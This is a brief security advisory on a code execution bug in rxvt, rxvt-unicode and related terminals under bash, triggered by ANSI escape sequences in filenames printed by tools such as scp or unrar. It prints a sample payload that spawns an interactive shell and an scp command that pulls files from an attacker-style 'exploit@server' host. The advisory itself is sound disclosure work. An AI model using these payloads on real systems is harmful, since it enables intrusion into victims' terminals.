(u)rxvt terminal (+bash) remoteish code execution 0day
Version: rxvt 2.7.10, rxvt-unicode 9.22, mrxvt 0.5.4, aterm 1.0.1, eterm 0.9.7
Date: 2021-04-20 (updated 2021-05-20)
Author: def <firstname.lastname@example.org>
Threads: oss-security full-disclosure
- rxvt, rxvt-unicode or other rxvt-based terminal
- bash shell. It is possible to target at least ksh as well, but zsh probably not
- User interaction! The victim must enter a command to run a program✱ that ...
✱ Suitable target programs include popular CLI tools such as scp, unrar, git-clone ...
- plants attacker's payload file(s) in a subdirectory of the current directory
- outputs text containing ANSI escape sequences which trigger the code execution
Payload (planted as ZZZ/0, ZZZ/1 and/or ZZZ/Z0 in the PoC exploits)
uname -a && id && date && /bin/sh -i
scp -r exploit@server:/backup/ .
Note: GNU tar is not exploitable due to proper escaping of ANSI escape sequences in filenames!